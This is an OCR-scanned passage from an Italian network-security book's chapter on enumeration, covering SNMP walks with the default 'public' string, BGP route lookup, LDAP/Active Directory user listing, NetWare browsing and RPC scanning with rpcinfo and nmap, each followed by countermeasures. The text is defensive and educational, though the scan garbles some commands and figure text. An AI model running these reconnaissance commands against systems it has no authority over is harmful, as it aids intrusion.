Accesso alla rete: lasciare che le autorizza- 
zioni per everyone siano applicate agli uten- 
ti anonimi. 

Accesso alla rete: named pipe alle quali è 
possibile accedere in forma anonima, 


Accesso alla rete: percorsi per il Registro ac- 
cessibili da remoto. 

Accesso alla rete: condivisioni cui è possibi- 
le accedere in forma anonima. 


Configurazione consigliata 


Disattivata. Blocca user2sid e tool simili. 


Attivata. Blocca i tool che eludono l'impo- 
stazione RestrictAnonymous = 1. 


Attivata. Blocca i tool che eludono l'impo- 
stazione RestrictAnonymous = 1. 


Disattivata. Sebbene sia simile a Restrict- 
Anonymous = 2, in realtà le sessioni nulle 
sono ancora possibili. 

Dipende dal ruolo del sistema. Considerate 
la possibilità di rimuovere SQL/QUERY ed 
EPMAPPER per bloccare rispettivamente 
l'enumerazione SQL e MSRPC. 

Dipende dal ruolo remoto, Per stare sul si- 
curo, non impostatelo. 


Dipende dal ruolo del sistema. Per essere si- 
curi, non impostatelo; l'impostazione di de- 
fault è COMCFG, DFS$. 
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9 Enumerazione mediante SNMP, porta UDP 161 


Diffusione: ri 
Semplicità: 9 
Impatto: 3 
Fattore di rischio: 6 


Concepito come servizio di gestione e monitoraggio della rete, l’SNMP (Simple 
Network Management Protocol) è stato progettato per fornire informazioni molto 
“private” sui dispositivi, sul software e sui sistemi della rete; pertanto esso è spesso 
oggetto delle attenzioni degli aggressori. Inoltre, l'assenza di protezioni valide gli è 
valso il soprannome “Sicurezza? Non è cosa che mi riguardi”, 

I dati dell'SNMP sono protetti mediante un semplice sistema di autenticazione di 
nomi utenti/password. Purtroppo, per le implementazioni dell’SNMP esistono di- 
verse password di default ben note. Per esempio, la password comunemente imple- 
mentata per accedere a un agente SNMP in modalità di sola lettura (la cosiddetta 
stringa read community) è “public”. Gli aggressori tenteranno invariabilmente di 
identificare questa stringa se individuano l'SNMP nelle scansioni delle porte. 

C'è di peggio: molti fornitori hanno implementato proprie estensioni al set di infor- 
mazioni di base dell'SNMP (chiamate MIB, Management Information Base). Queste 
MIB possono contenere informazioni specifiche del fornitore (per esempio, la MIB 
di Microsoft contiene i nomi degli account utente di Windows). Pertanto, anche se 
avete protetto rigidamente l’accesso all'SMB tramite la TCP. 139 e/o la 445, i vostri si- 
stemi della famiglia NT possono tuttora disseminare informazioni simili se su di essi 
viene eseguito il servizio SNMP nella sua configurazione di default (che, lo avrete 
indovinato, utilizza “public” come stringa read community). Pertanto, l’enumerazio- 
ne degli utenti di Windows tramite SNMP è estremamente agevole quando si utiliz- 
za snmputil, il browser SNMP di RK: 


C:\>snmputil walk 192.168.202.33 public .1.3.6.1.4.,1.77.1.2.25 
Variable = .iso.org.dod.internet.private.,enterprises.lanmanager. 
lanmgr-2.server.svUserTable.svUserEntry.svUserName.5. 
71.117,101.115.116 

OCTET STRING - Guest 


Value 


Variable = .iso.org.dod.internet.private.enterprises.lanmanager. 
lanmgr-2.server. svUserTable.svUserEntry.svUserName.13. 
65.100.109.105.110.105.115.116.114.97.116.111.114 
Value = OCTET STRING - Administrator 


End of MIB subtree. 


L'ultima variabile nella sintassi precedente, cioè “.1.3.6.1.4.1.77.1.2.25”, si riferisce 
all'identificatore di oggetto (OID) che specifica una particolare sezione del MIB 
aziendale Microsoft. La MIB è uno spazio dei nomi gerarchico, per cui risalendo l’al- 
bero (ossia, utilizzando un numero meno specifico quale .1.3.6.1.4.1.77) sarà possi- 
bile scaricare quantità sempre maggiori di informazioni. Ricordare tutti questi nu- 
meri è un'impresa, per cui un intruso utilizzerà la stringa di testo equivalente. La ta- 
bella a pagina seguente riporta alcuni segmenti della MIB da cui è possibile racco- 
gliere i frutti più succosi. 
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SNMP MIB (da accodare a .iso.org.dod.internet Informazioni enumerate 
.private.enterprises.lanmanager.lanmgr?2) 


.server.svSvcTable,svSvcEntry.svSvcName Servizi in esecuzione 
.server.svShareTable.svShareEntry.svShareName Nomi di condivisioni 
.server.svShareTable.svShareEntry.svSharePath Percorsi di condivisioni 
.server.svShareTable.svShareEntry.svShareComment Commenti su condivisione 
.server.svUserTable.svUserEntry.svUserName Nomi utenti 
.domain.domPrimaryDomain Nome di dominio 


Potete anche utilizzare il tool UNIX/Linux snmpget per interrogare SNMP, come 
mostrato nell'esempio seguente: 


[root]# snmpget 192.168.1.60 public system.sysName.0 
system.sysName.0 = wave 


Sebbene snmpget sia utile, è possibile carpire in molto meno tempo il contenuto 
dell’intera MIB utilizzando snmpwalk, come mostrato di seguito: 


[root]# snmpwalk 192.168.1.60 public 

system.sysDescr.0 = Linux wave 2.4.3-20mdk #1 Sun Apr 15 2001 i686 
system.sysObjectID.0 = OID: enterprises.ucdavis.ucdSnmpAgent.linux 
system.sysUpTime.QO = Timeticks: (25701) 0:04:17.01 
system.sysContact.0 = Root <root@localhost> (configure 
/etc/snmp/snmp.conf)system.sysName.0 = wave 

system.sysLocation.0 = Unknown (configure 
letc/snmp/snmp.conf)system.sysORLastChange.Q = Timeticks: (0) 


[output troncato per motivi di spazio] 


Come potete vedere, la nostra query sull'SNMP ha fornito numerose informazioni 
sui sistemi bersaglio, tra cui quelle elencate nella tabella seguente. 


Variante UNIX: Linux 

Versione del kernel di Linux: 24.3 

Distribuzione: Mandrake (indicato da mdk dopo il numero del 
kernel) 

Architettura: Intel 686 


Un aggressore potrebbe utilizzare queste numerose informazioni per compromette- 
re il sistema. C'è di peggio: se è stato attivato il nome della write community di de- 
fault (per esempio, “private”), egli sarà in grado di modificare alcuni dei parametri 
appena elencati in modo da provocare un Denial of Service o compromettere la si- 
curezza del sistema. 

Ovviamente, per evitare tutto questo lavoro alla tastiera, potete scaricare l’eccellen- 
te browser SNMP con modalità grafica chiamato IP Network Browser (http: 
//ww.solarwinds.net) e vedere tutte queste informazioni visualizzate con colori 
squillanti. La Figura 3.5 mostra IP Network Browser mentre ricerca in una rete siste- 
mi che supportino l’SNMP. 
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IP Browser 192.168.202. 0\255, 255.255.0 


192.168.202.1: 

192.168.202.30: SM MGR 

192.168.202.3Z: SM_MCR 
D HM 192. 168.202.33: DELLPII 


5 vindows NT 
Community String: public 


System MIE 
Interfaces 


Accounts 
Administrator 
barzini 


godfather 
Guest 
lucca 
mike 
Shares 


È] TENP 
0] Binaries 


{0 Path: C:\Binaries 
j Comment: Free goodies! 

Shared Printers 

Hub ports 

TCP/IP Networks 

IPX Network 

Routes 

ARP Table 

UDP Services 

TCP Connections 

192.168.202.37: MICHAEL 


Figura 3.5 


Il browser di rete IP di SolarWinds, una volta ricevuta la stringa 
di comunità corretta, visualizza ogni informazione relativa al sistema provvisto 
di agenti SNMP. L'esempio mostrato è stato ottenuto con la stringa “public’. 


Alcuni gravi problemi di vulnerabilità sono associati a molte implementa- 
zioni popolari dell'SNMP che possono assicurare a un aggressore remoto 
l'accesso amministrativo, Pertanto, l'enumerazione sarà l’ultima delle vo- 
stre preoccupazioni qualora un malintenzionato trovi sulla vostra rete un 
agente SNMP non adeguatamente protetto con patch! 


Contromisure all’enumerazione SNMP 


Il modo più semplice per prevenire questo tipo di attività è rimuovere l'agente SNMP 
o disattivare il servizio SNMP nei Servizi del Pannello di controllo. Se proprio non po- 
tete eliminare SNMP, almeno fate in modo che sia configurato correttamente in modo 
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da utilizzare identificatori di comunità personalizzati (al posto di quello predefinito 
“public” o “private”). Ovviamente, se utilizzate SNMP per gestire la vostra rete, dovete 
assicurarvi che l’accesso alle porte TCP e UDP 161 (SNMP GET/SET) sia bloccato lun- 
go tutti i collegamenti più esterni di accesso alla rete. Infine, limitate l'accesso agli 
agenti SNMP al solo indirizzo IP della consolle di gestione. Per esempio, l'agente 
SNMP di Microsoft può essere configurato affinché risponda unicamente a richieste 
SNMP originate da un set di indirizzi IP definito dall'amministratore. 

Considerate inoltre la possibilità di utilizzare la SNMP V3, illustrata nelle RFC 
2571-2575. La SNMP V3 è molto più sicura della V1 e mette a disposizione meccani- 
smi avanzati di crittografia e autenticazione. (La V2 è stata soppiantata dalla V3, per 
cui non ne parleremo qui.) Malauguratamente, la V1 è la versione più spesso imple- 
mentata e molte organizzazioni sono riluttanti a effettuare la migrazione a una ver- 
sione più sicura. 

Nei sistemi della famiglia Windows NT potete modificare il Registro di sistema in 
modo da consentire esclusivamente accessi autorizzati al nome comunità SNMP e 
impedire l’invio di informazioni su NetBIOS. Per prima cosa, aprite regedt32 e sele- 
zionate il percorso HKLM\System\CurrentControlSet\Services\\ SNMP\Parame- 
ters\ValidCommunities, Selezionate Security\Permissions, impostando le autorizza- 
zioni in modo che vi possano accedere unicamente utenti noti. Quindi, spostatevi 
su HKLM\System\CurrentControlSet\Services\SNMP\Parameters\ExtensionAgents, 
eliminate il valore contenente la stringa “LANManager-MIB2Agent” e rinominate le 
voci rimanenti in modo da ricostruire la sequenza. Per esempio, se eliminate il valo- 
re numero 1, rinominate 2, 3 e così via, fino a quando la sequenza non inizia con 1 
e termina con il numero totale dei valori presenti nell'elenco. Confidiamo che dopo 
aver letto questo paragrafo abbiate compreso i motivi per cui occorre assolutamen- 
te evitare che le informazioni interne dell'SNMP trapelino sulle reti pubbliche. Per 
maggiori informazioni sull'SNMP, consultate le RFC più recenti all'indirizzo ht- 
tp://ww.rfc-editor.org. 


} 
be 
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BGP (Border Gateway Protocol) è il protocollo di routing de facto su Internet ed è 
utilizzato dai router per propagare le informazioni necessarie a instradare i pacchet- 
ti IP alla loro destinazione. Guardando le tabelle BGP è possibile individuare le reti 
associate a una particolare azienda, da aggiungere poi all'archivio dei possibili host 
attaccabili. Non tutte le reti collegate a Internet “parlano” BGP e dovete tener pre- 
sente che questo metodo può non funzionare sulla vostra rete aziendale: viene uti- 
lizzato solo dalle reti che dispongono di diversi collegamenti di tipo uplink, facenti 
capo a organizzazioni medio-grandi. 

La metodologia è semplice. I passaggi necessari per svolgere l'enumerazione di rou- 
te BGP sono i seguenti. 


1. Determinate l’ASN (Autonomous System Number) dell’organizzazione ber- 
saglio. 

2. Eseguite una query sui router per identificare tutte le reti in cui il percorso 
AS Path termina con l’ASN dell’organizzazione. 
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Il protocollo BGP utilizza solo gli indirizzi di rete IP e gli ASN, che sono numeri interi da 
16 bit, acquistati da ARIN per l’identificarsi in rete delle organizzazioni. ASN può essere 
paragonato a un indirizzo IP 0, nel gergo di BGP, a un “numero di sistema autonomo”. 
Poiché non è possibile eseguire comandi su un router utilizzando il nome di un’azien- 
da, il primo passo da compiere è determinare l’ASN dell’organizzazione. Sono disponi- 
bili due tecniche apposite per effettuare questa operazione, in base al tipo di informa- 
zioni disponibili. Un approccio, se disponete del nome dell'azienda, consiste nell’ese- 
guire una ricerca whois su ARIN con la parola chiave ASN (si veda la Figura 3.6). 


Z Output from ARIN WHOIS - Microsoft Internet Explorer 


| Ele Gt son. Favntee 


Output from ARIN WHOIS 


Iuitp //Avavww arîn nat'iuheis 


Search for | — Subrit Query — 


kpe (ASN-KPENY-A5S) 
860 Broadway, 6th Floor 
New York, NY 10003 
us 


Autonomous System Name: KPENY-AS 
Autonomous System Number: 16394 


Coordinator: 
Uong, David (DUSS6-ARIN) dv280@hotmail.com 
(917) 864-9202 


Record last updated on 25-Apr-2000. 
Database last updated on 23-May-2001 22:44:44 EDT. 


Figura 3.6 
L'output di una ricerca su “ASN KPE", L'ASN viene identificato come 16394 per l'AS Name KPENY-AS. 


In alternativa, se avete un indirizzo IP per l’organizzazione, potete interrogare un 
router e utilizzare l’ultima voce del percorso AS, come ASN. Per esempio, è possibi- 
le effettuare un’interrogazione telnet su un router pubblico ed eseguire i comandi 
seguenti. Identificate l’elenco dei numeri come percorso AS e utilizzate l’ultimo nu- 
mero, 16394: 


C:> telnet route-views.oregon-ix.net 
route-views.oregon-ix.net>show ip bgp 63.79.158.1 
BGP routing table entry for 63.79.158.0/24, version 7215687 
Paths: (29 available, best #14) 

Not advertised to any peer 

8918 701 16394 16394 
212.4.193.253 from 212.4.193.253 (212.4.193.253) 
Origin IGP, localpref 100, valid, external 
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La seconda procedura consiste nell’interrogare il router utilizzando l’ASN, per deter- 
minare gli indirizzi di rete a esso associati: 


route-views.oregon-ix.net>show ip bgp regexp _16394$ 
BGP table version is 8281239, local router ID is 198.32.162.100 
Status codes: s suppressed, d damped, h history, * valid, > best, i - 
@®internal 
Origin codes: i - IGP, e - EGP, ? - incomplete 

Network Next Hop Metric LocPrf Weight Path 
* 63.79.158.0/24 212.4,193.253 (") 8918 701 16394 16394 


Il carattere underscore (_) è utilizzato per indicare uno spazio, il segno del dollaro 
($) per indicare la fine del percorso AS: questo è necessario per filtrare gli ingressi 
in cui VAS è una rete di transito. I percorsi duplicati nel listato dell'output sono stati 
eliminati perché inutili ai fini della spiegazione, ma la query ha identificato una rete, 
63.79.158.0/24, come appartenente al KPE. 

L'esecuzione di queste procedure e l’analisi dell'output è un compito noioso e adat- 
to all'automazione. Lasciate lavorare il vostro codice! 

Concludiamo con alcuni avvertimenti. Molte organizzazioni non utilizzano BGP e 
questa tecnica può non funzionare. In questo caso, se ricercate nel database ARIN, 
non riuscirete a trovare un ASN. Se utilizzate il secondo metodo, l’ASN restituito po- 
trebbe essere l’ASN del provider di servizi che sta comunicando con messaggi BGP 
per conto del suo cliente. Consultate ARIN per determinare se disponete dell’ASN 
corretto. La tecnica che abbiamo mostrato è un processo lento, a causa del numero 
di voci di routing che devono essere ricercate. 


Contromisure all’enumerazione mediante BGP 


Purtroppo non esiste una buona contromisura per l'enumerazione dei router me- 
diante BGP. Per i pacchetti da indirizzare alla vostra rete dovete utilizzare BGP. Una 
possibilità risiede nell'utilizzo di informazioni non identificabili in ARIN, anche se 
questo non impedisce il ricorso alla seconda tecnica per identificare l’ASN, Le orga- 
nizzazioni che non utilizzano BGP non hanno nulla di cui preoccuparsi, mentre le 
altre possono consolarsi notando il basso fattore di rischio e rendendosi conto che 
possono essere utilizzate le altre tecniche descritte in questo capitolo per l’enume- 
razione di rete. 


O Enumerazione mediante il servizio Active Directory 
di Windows, con LDAP 
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Semplicità: 2 
Impatto: 5 
Fattore di rischio: 3 


La modifica più importante introdotta da Windows 2000 è l'aggiunta del servizio di 
directory basato sul protocollo LDAP (Lightweight Directory Access Protocol), deno- 
minato AD (Active Directory). AD è progettato per contenere una rappresentazione 
logica e unificata di tutti gli oggetti relativi all’infrastruttura tecnologica aziendale: di 
conseguenza, dal punto di vista dell’enumerazione, rappresenta un possibile punto 
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di fuoriuscita delle informazioni. Il Windows 2000 Support Tools (memorizzato nel- 
la cartella Support/ Tools del CD di installazione del componente server) comprende 
un semplice client LDAP chiamato Active Directory Administration Tool (1dp. exe), 
che si collega a un server AD ed esplora il contenuto delle directory. 

Analizzando i requisiti di sicurezza di Windows 2000 Release Candidates, 
nell'estate del 1999, abbiamo scoperto che accedendo a un controllore di domi- 
nio Win 2000 è possibile visualizzare l'elenco di tutti gli utenti e i gruppi esisten- 
ti, con una semplice interrogazione LDAP: la sola condizione richiesta per effet- 
tuare questa enumerazione è la creazione tramite LDAP di una connessione au- 
tenticata. Se un aggressore ha già manomesso un account del sistema target me- 
diante altri mezzi, LDAP può fornire un meccanismo alternativo per enumerare 
gli utenti, nel caso in cui le porte NetBIOS siano bloccate o rese in qualche 
modo indisponibili. 

Nell'esempio seguente illustriamo il meccanismo di enumerazione di utenti e 
gruppi utilizzando il client 1dp. L'obiettivo dell'attacco è il controllore di domi- 
nio di Windows 2000 bigdc.labfarce.org, il cui contesto di root Active Directory 
è DC=labfarce, DC=org. Partiamo dall’ipotesi che l'account guest di BIGDC sia 
già stato manomesso e che la sua password sia “guest”. I passaggi necessari 
sono elencati di seguito. 

1. Per prima cosa, colleghiamoci al bersaglio utilizzando lap: selezioniamo la 
voce di menu Open Connection/Connect, quindi digitiamo l’indirizzo IP o il 
nome DNS del server target. È possibile collegarsi alla porta LDAP 389 pre- 
definita, oppure utilizzare la porta 3268 AD Global Catalog. La porta 389 è 
mostrata nella figura seguente. 


[Connect = 
Server [bigde labfarce org 


Port [pes TT” Connectionless 
loss } i 


[o]. ea | 


2. Una volta stabilita la connessione, autentichiamoci come utente Guest com- 
promesso. Per effettuare questa operazione è necessario selezionare la voce 
di menu Commections/Bind, assicurandosi di selezionare la casella Domain 
che riporta il nome di dominio corretto, e inserire le credenziali dell'utente 
Guest, come mostrato nella figura seguente. 


User 


fmi 


f Domain: [labfarce.org ; 
[NTLM/Kerberos] Cancel | 


Agsenced] 
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3. Ora che abbiamo stabilito una sessione LDAP autenticata, possiamo enume- 
rare utenti e gruppi. Apriamo il menu ViewTree e inseriamo il contesto di 
root nella finestra di dialogo visualizzata (per esempio, dc=labfarce, 
de=org). 


de=labfarce,do=on 


4. Sul pannello sinistro viene visualizzato un nodo. Facciamo clic sul simbolo 
+ per aprire il nodo e visualizzare l'elenco degli oggetti base memorizzati 
sotto la root della directory. 


5. Infine facciamo doppio clic per aprire i contenitori CN=Users e CN=Builtin 
ed enumerare tutti gli utenti e i gruppi predefiniti sul server. Nella Figura 
3.7 viene visualizzato il contenitore Users. 


Idap::4/bigde.labfarce. org/DC=labfarce.D C=org 


=. de=labfarce,de=otg 
+. CN=Builtin DC=labfarce DC=orc 
CN=Computers.DC=labfarce DL 
DU=Domain Controllers .DC=lab 
CN=ForeignSecurityPrincipals,C 
CN=Infrastructure,DC=labfarce, 
CN=LostAndFound,DC=labfare: 
CN=System.DC=labfarce,DC=0. 
CN=Lsers DC=labtar r 
CN=Administrator,CN=User: 
CN=Cert Publishers,CN=Us 
CN=DnsAdmins,CN=Users. i 1> instanceType: 4; 
CN-DnsUpdatePiosyCN-L_l || —’’.‘19 isCriticalSystemObject: TRUE; 
CN=Domain Admins,CN=U 
CN=Domain Computers,CN 
CN=Domain Controllers.CN: 
CN=Domain Guests,CN=Us 
CN=Domain Users, CN=Use 
CN=Enterprise Admins,CN= 


Figura 3.7 


La funzionalità Amministrazione di Active Directory, Idp.exe, enumera 
gli utenti e i gruppi di Active Directory, mediante una connessione autenticata. 


Com'è possibile ottenere tutte queste informazioni partendo da una semplice con- 
nessione guest? Alcuni servizi NT 4 (come RAS e SQL Server) devono essere in gra- 
do di interrogare gli oggetti utente e gruppo contenuti in AD. La procedura di instal- 
lazione del servizio AD di Windows 2000 (dcpromo) chiede se l'utente desidera im- 
postare autorizzazioni di accesso ridotte sulla directory per consentire ai server esi- 
stenti di eseguire queste ricerche, come mostrato nella Figura 3.8. Se le autorizza- 
zioni di accesso sono impostate durante l'installazione, è possibile accedere agli 0g- 
getti utente e gruppo per'effettuare l’enumerazione utilizzando il protocollo LDAP. 


100 Capitolo 3 


Installazione guidata di Active Directory 


Autorizzazioni 
Selezionare le autorizzazioni predefinite per gli oggetti utente e di gruppo. 


Figura 3.8 


La procedura guidata di installazione di Active Directory (dcpromo) 
chiede se le autorizzazioni predefinite per gli oggetti utente e gruppo 
devono essere ridotte, al fine di consentire l'accessibilità. 


© Contromisure all’enumerazione 
mediante il servizio Active Directory 


Per prima cosa, filtrate l’accesso alle porte TCP 389 e 3268 sui dispositivi più esterni 
della rete: se non avete intenzione di esportare il servizio AD, nessuno dovrebbe di- 
sporre di un accesso non autenticato alla directory. 

Per impedire la fuoriuscita di queste informazioni verso utenti non autorizzati su reti 
interne, non totalmente sicure, è necessario limitare le autorizzazioni di accesso al 
servizio AD. La differenza tra la modalità compatibile con i sistemi precedenti (leggi 
“meno sicura”) e quella nativa Windows 2000 si riduce essenzialmente all’apparte- 
nenza al gruppo locale Pre-Windows 2000 Compatible Access. Il gruppo Pre-Win- 
dows 2000 Compatible Access dispone delle autorizzazioni di accesso alla directory 
mostrate nella Tabella 3.3. 


Tabella 3.3 Autorizzazioni per gli oggetti utente e gruppo del servizio Active Directory 
per il gruppo Pre-Windows 2000 Compatible Access 


Oggetto Autorizzazioni Valido per 
Root directory. Elenca il contenuto Questo oggetto 
e tutti i figli 
Oggetti utente Elenca il contenuto, Leggi tutte le proprietà, Oggetti utente 
Leggi autorizzazioni 
Oggetti gruppo Elenca il contenuto, Leggi tutte le proprietà, Oggetti gruppo 


Leggi autorizzazioni 


La procedura guidata di installazione di Active Directory aggiunge automaticamente 
l'utente Everyone al gruppo Pre-Windows 2000 Compatible Access, se si seleziona 
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Questa caratteristica può rivelarsi straordinariamente utile nella gestione di collega- 
menti e login ma, dal punto di vista dell’hacker, una volta completato un attach, è 
possibile recuperare l'albero NDS contenente il server, il numero della connessione 
e l'indirizzo di rete completo, compresi il numero di rete e l'indirizzo del nodo, 
come mostrato nella Figura 3.10. 


ME On-Site Admin - Novell Developer Support [28-| dx] 
Ele Help 


s| ae] a] 7] (so 


Servers. Vols/lRQs | connections | 


Volume Information. x1000 
Total ® 


Reload 


2J 
er ITS Priority of IROs: 0, 1, 2/9, 10, 11, 12, 13,14, 15,3,4,5,67 A 
| Interrupt | Driver ___—————TIO Address] Devi 


System Timer Standard 

i Keyboard Standard 

2 Video (Cascade to 9) 3C0-3CF Standard 

3 Serial Comm 2 300-31F Standard 

4 Serial Comm 1 3F8-3FF Standard 

5 Parallel Port 2 278-27F Standard 

G Dinlntta Cavtrallar _9EN:2E7 Standard zl ii NS 
I Servers 1 Volumes (1 connectione 
Figura 3.10 


L'utility Connessioni NetWare di Novell mostra l'albero NDS del quale il server fa parte, il numero 
della connessione e l'indirizzo di rete completo, incluso l'indicativo di rete e quello del nodo. 


Questo potrà servire in seguito, per collegarsi al server e ottenere i diritti di ammini- 
stratore (si veda a questo proposito il Capitolo 7). 


On-Site Admin: controllo dei server Novell 


Il prodotto On-Site Admin di Novell permette di esaminare lo stato di qualsiasi ser- 
ver presente in rete senza che sia necessario autenticarsi su un server. Invece di in- 
viare proprie richieste broadcast, sembra che On-Site si limiti a visualizzare i server 
già riconosciuti nelle Risorse di rete (che inviano periodicamente messaggi per 
identificare i server Novell sulla rete). La Figura 3.11 mostra la quantità di informa- 
zioni restituita da On-Site Admin. 

Un'altra “perla” all’interno di On-Site Admin è la funzione Analyze, visibile nella Fi- 
gura 3.12: è sufficiente selezionare un server e premere il pulsante Ana/yze per ot- 
tenere tutte le informazioni sul volume. Il semplice utilizzo della funzione Analyze 
di On-Site Admin apre una connessione con il server attaccato. 

Sebbene la fuga di queste informazioni non sia un fatto drammatico, esse sono un 
ulteriore contributo all'acquisizione di conoscenze sul sistema. 
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SE: On-Site Admin - Novell Developer Support 


Select Analyze Button 


Server Name (BECRET 
” REE Sa 
Version 
Max Connections 
Connections In Use ti AII 


Max Ever Used 


Number Of Volumes e 

SFT Level PCR 
TTS Level 

Server Utilization Br As | 


Login /D 
Timer Interval 
Console Operator (1 Second) 


Serial Number 


Figura 3.11 
On-Site Admin di Novell è lo strumento più utile per enumerare le reti Novell. 


XE On-Site Admin - Novell Developer Support 


Ele Help 
s|2|®|u|?| SECRET 
Servers  Vols/RQs | connections | 


Volume Informatori, x1000 
EE PENE TESE N NN [ORO PISTE ® 


System Timer Standard 


[a] 
1 Keyboard Standard 
è Video (Cascade to 9) 3C0-3CF Standard 
3 Serial Comm 2 300-31F Standard 
4 Serial Comm 1 3F8-3FF Standard 7? 
5 Parallel Port 2 278-27F Standard 
G Nicicatta Nantralla» aFN 2F7 Standard 2]. Remove NS 
1 Servers 1 Volumes 1 connections 
Figura 3.12 


On-Site Admin mostra informazioni sul volume. 
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Con On-Site Admin è possibile esplorare quasi interamente gli alberi NDS. In que- 
sto caso Client32 realizza effettivamente una connessione con il server selezionato 
all'interno dell’albero: questo perché, di default, NetWare 4.x permette a chiunque 
di esplorare l'albero. Nella Figura 3.13 sono mostrate alcune delle informazioni più 
delicate che è possibile raccogliere: utenti, gruppi, server, volumi, in pratica tutto! 


& gkunz 

8 Human Resources 
 jbenson 
 jgoldberg 

& jhanley 
 jhomey 

® jscambray(=) 

è jsmith 

& jsymoens 

P Marketing 

& mdolphin 

88 MIS 

& mmseadows 

28 Research & Development 
a rpaul 

A Sales 

A SECRET 

E SECRET_NWA11 
El SECRET_SYS 
& smoclure 

& tgoody 

& estein 


Figura 3.13 
On-Site Admin permette l'esplorazione totale dell'albero NDS. 


Infine, nel novembre 2000 il team di ricerche sulla sicurezza Razor annunciò la pre- 
senza di un baco in NetWare 5.0 e 5.1 che consentiva l’enumerazione di oggetti in 
ambiente Novell, compresi oggetti NDS e listati dinamici nella tabella SAP (Service 
Announcement Protocol), che può includere notizie su prodotti hardware e software 
non Novell. Secondo Razor, questa vulnerabilità “avrebbe una portata simile a una... 
sessione nulla Windows contro un ...controllore di dominio”. Razor ha rilasciato un 
tool chiamato NCPQuery in grado di sondare server vulnerabili ed enumerare oggetti 
tramite la porta ‘CP 524 (http://razor.bindview.com/tool/index.shtml). 

Utilizzando le informazioni ottenute in questo modo, un aggressore può quindi pas- 
sare alla penetrazione attiva nel sistema, come spiegheremo nel Capitolo 6. 


Contromisure all’enumerazione di NetWare 


Come sempre, la migliore difesa consiste nel limitare l’accesso ai servizi in questione. È 
ovvio che la presenza di IPX non sarà evidente al di là del firewall al confine con Inter- 
net; ma rammentate che gli intrusi possono accedere alle parti essenziali della rete IPX 
tramite la TCP 524. Non esponete questo protocollo all'accesso da reti non fidate. 

Potete limitare la possibilità di esplorazione dell'albero NDS aggiungendo un filtro 
basato sui diritti di eredità (IRF) alla root dell'albero stesso. Le informazioni conte- 
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nute nell’albero sono incredibilmente delicate. Pertanto non vorrete che qualcuno 
le esplori casualmente. 

Per prevenire l’enumerazione di oggetti tramite la falla in NetWare 5.x scoperta da 
Razor, eliminate Browse rights dall'oggetto NDS [Public] e consentite l’accesso all’al- 
bero unicamente agli utenti autenticati. 


All’indirizzo http://support.novell.com troverete le opportune patch per 
la sicurezza e alcuni consigli utili. 


® Enumerazione in UNIX, porte TCP/UDP ||| e 3277 
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Semplicità: 10 
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Fattore di rischio: 6 


Come qualsiasi altra risorsa di rete, le applicazioni necessitano di un modo per co- 
municare tra loro sulla rete. Uno dei protocolli più utilizzati a questo scopo è RPC 
(Remote Procedure Call. RPC utilizza un programma detto portmapper (attualmen- 
te noto come rpcebind), che interpreta le richieste dei client alle porte, che vengono 
assegnate dinamicamente alle applicazioni in ascolto. Nonostante i problemi nei 
quali sono incorsi in passato gli amministratori di firewall, RPC è ancora estrema- 
mente popolare. rpcinfo è l'equivalente di finger per l’enumerazione delle appli- 
cazioni RPC in ascolto su host remoti, e può essere utilizzato su server che siano ri- 
sultati in ascolto sulla porta 111 (rpcebind) o 32771 (portmapper alternativo di Sun) 
nelle scansioni precedenti: 


[root$]rpcinfo -p 192.168.202.34 
program vers proto port 


100000 2 tep 111 rpcbind 
100002 3 udp 712 rusersd 
100011 2 udp 754 rquotad 
100005 1. udp 635 mountd 
100003 2 udp 2049 nfs 

100004 2 top 778 vypserv 


Questo indica agli aggressori che l'host sta eseguendo rusersd, NFS e NIS (ypserv 
è il server NIS). Quindi è possibile ottenere ulteriori informazioni utilizzando ru- 
sers, showmount -e e pscan -n (questi strumenti saranno illustrati nei paragrafi se- 
guenti). Lo strumento pscan può essere utilizzato per enumerare anche queste in- 
formazioni utilizzando il parametro -r. 

Nei sistemi Windows NT è possibile utilizzare una variante di rpcinfo, chiamata 
rpedump e scritta da David Litchfield di Cerberus Information Security (per ulteriori in- 
formazioni consultate il sito Web all'indirizzo http://ww.atstake.com/research 
/tools/rpcdump.exe). Il comportamento di rpedump è analogo a rpcinfo -p, come 
mostrato di seguito: 


C:\>rpcdump 192.168.202.105 
Program no. Name Version Protocol Port 


(100000) portmapper 4 TCP 111 
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(100000) portmapper 3 TCP 222 
(100001) rstatd 2 UDP 32774 
(100021) nlockmgr A UDP 4045 


Per gli hacker, ci sono anche altri modi di utilizzare RPC. La versione di UNIX Sola- 
ris di Sun prevede un secondo portmapper sulle porte superiori a 32771, quindi una 
versione modificata di rpcinfo indirizzata su tali porte, dalla quale si potrebbero ot- 
tenere tutte le informazioni, anche nel caso in cui la porta 111 sia bloccata. 

Il migliore strumento di scansione RPC attualmente in circolazione è nmap, descritto 
dettagliatamente nel Capitolo 7, tuttavia un hacker potrebbe utilizzare alcuni para- 
metri di rpcinfo per cercare particolari applicazioni RPC: per esempio, può verificare 
se il sistema target all'indirizzo 192.168.202.34 stia eseguendo il server TTDB (700/- 
Talk DataBase), di cui è noto almeno un problema di sicurezza (si veda il Capitolo 
7). Si potrebbe per esempio utilizzare il comando seguente: 


{root$]rpcinfo -n 32776 -t 192.168.202.34 100083 


100083 è il “numero di programma” RPC associato a TTDB. 
Se si utilizza nmap non è necessario fornire un preciso numero di programma (come 
il 100083). Sarà sufficiente aggiungere l’opzione -sR: 


[root$]nmap -s$ -sR 192.168.1.10 
Starting nmap V. 2.53 by fyodor@insecure.org ( ww.insecure.org/nmap/ ) 


Interesting ports on (192.168.1.10): 
(The 1495 ports scanned but not shown below are in state: closed) 


Port State Service (RPC) 

23/tcp open telnet 

4045/tcp open lockd (nlockmgr V1-4) 

6000/tcp open XI11 

32771/tcp open sometimes-rpc5 (status V1) 
32772/tcp open sometimes-rpc7 (rusersd V2-3) 
32773/tcp open sometimes-rpc9 (cachefsd VI) 
32774/tcp open sometimes-rpc11 (dmispd VI) 
32775/tcp open sometimes-rpc13 (snmpXdmid Vi) 
32776/tcp open sometimes-rpc15 (tttdbservd VI) 
Nmap run completed -- 1 IP address (1 host up) scanned in 43 seconds 


© Contromisure all’enumerazione RPC 


Non esiste un modo semplice per limitare questa fuga di informazioni, a parte 
utilizzare una qualche forma di autenticazione per RPC (consultate il vostro pro- 
duttore RPC per sapere quali opzioni sono disponibili). In alternativa è possibile 
passare a un pacchetto quale Secure RPC di Sun che autentica sulla base di mec- 
canismi crittografici a chiave pubblica. Infine accertatevi che le porte 111 e 
32771 (rpebind), oltre alle altre porte RPC, siano filtrate presso il firewall o disat- 
tivate sui sistemi UNIX. 
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E) Rwho (UDP 513) e Rusers (RPC Program 100002) 


Diffusione: 3 
